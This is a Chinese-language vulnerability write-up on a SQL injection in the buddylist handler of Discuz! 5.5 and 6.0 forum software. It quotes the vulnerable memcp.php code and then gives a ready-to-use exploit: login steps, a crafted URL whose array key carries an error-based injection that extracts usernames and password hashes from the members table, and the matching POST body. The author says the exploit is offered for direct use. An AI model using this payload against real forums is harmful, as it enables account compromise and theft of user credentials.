discuz! 5.5 + discuz! 6.0 sql注入漏洞

漏洞文件:memcp.php

elseif($action == 'buddylist') {

        if(!submitcheck('buddysubmit', 1)) {

                $query = $db->query("SELECT b.*, m.username FROM {$tablepre}buddys b, {$tablepre}members m
                        WHERE b.uid='$discuz_uid' AND m.uid=b.buddyid ORDER BY dateline DESC");
                while($buddy = $db->fetch_array($query)) {
                        $buddy['dateline'] = gmdate("$dateformat $timeformat", $buddy['dateline'] + $timeoffset * 3600);
                        $buddylist[] = $buddy;
                }

                include template('memcp_misc');

        } else {

                $buddyarray = array();
                $query = $db->query("SELECT * FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
                while($buddy = $db->fetch_array($query)) {
                        $buddyarray[$buddy['buddyid']] = $buddy;
                }
                
                if(!empty($delete) && is_array($delete)) {
                        $db->query("DELETE FROM {$tablepre}buddys WHERE uid='$discuz_uid' AND buddyid IN ('".implode('\',\'', $delete)."')");
                }
              
                if(is_array($descriptionnew)) { //问题出在这里 $descriptionnew未被初始化 discuz会初始时注册变量, 当我们提交 http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[123']=1 的时候 注册了$descriptionnew 变量
/*
include/common.inc.php
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
        foreach($$_request as $_key => $_value) {
                $_key{0} != '_' && $$_key = daddslashes($_value); 
        }
}
*/
                        foreach($descriptionnew as $buddyid => $desc) { //此时的 $buddyid 就是123' 程序初始化的代码不会过滤这里 但是会受gpc的影响
                                if(($desc = cutstr(dhtmlspecialchars($desc), 255)) != addslashes($buddyarray[$buddyid]['description'])) {
                                    
                                        $db->query("UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='$buddyid'"); //$buddyid  被带入到update 语句中了
                                                //相当于 UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='123''
                                }
                        }
                }

                if(($newbuddy && $newbuddy != $discuz_userss) || ($newbuddyid && $newbuddyid != $discuz_uid)) {
                        if(!in_array($adminid, array(1, 2, 3))) {
                                $query = $db->query("SELECT COUNT(*) FROM {$tablepre}buddys WHERE uid='$discuz_uid'");
                                if(($db->result($query, 0)) > 20) {
                                        showmessage('buddy_add_toomany');
                                }
                        }

                        $query = $db->query("SELECT uid FROM {$tablepre}members WHERE ".(empty($newbuddyid) ? "username='$newbuddy'" : "uid='$newbuddyid'"));
                        if($buddyid = $db->result($query, 0)) {
                                if(isset($buddyarray[$buddyid])) {
                                        showmessage('buddy_add_invalid');
                                }
                                $db->query("INSERT INTO {$tablepre}buddys (uid, buddyid, dateline, description)
                                        VALUES ('$discuz_uid', '$buddyid', '$timestamp', '".cutstr(dhtmlspecialchars($newdescription), 255)."')");
                        } else {
                                showmessage('buddy_add_nonexistence');
                        }
                }

                showmessage('buddy_update_succeed', 'memcp.php?action=buddylist');

        }

分析没有什么技术含量所以 还是给出利用方法吧,方便大家以后遇见后可以不用像我一样下代码回来分析而是有个可以直接利用的方法和代码
1.先注册账号然后登陆账号
2.

http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[']=1
post
formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4

formhash 看html源代码直接替换下

exp:

http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,password,0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1
post
formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4

看了一下Discuz6也是存在的..不过移到了这个地方:
http://L/my.php?item=buddylist

发表评论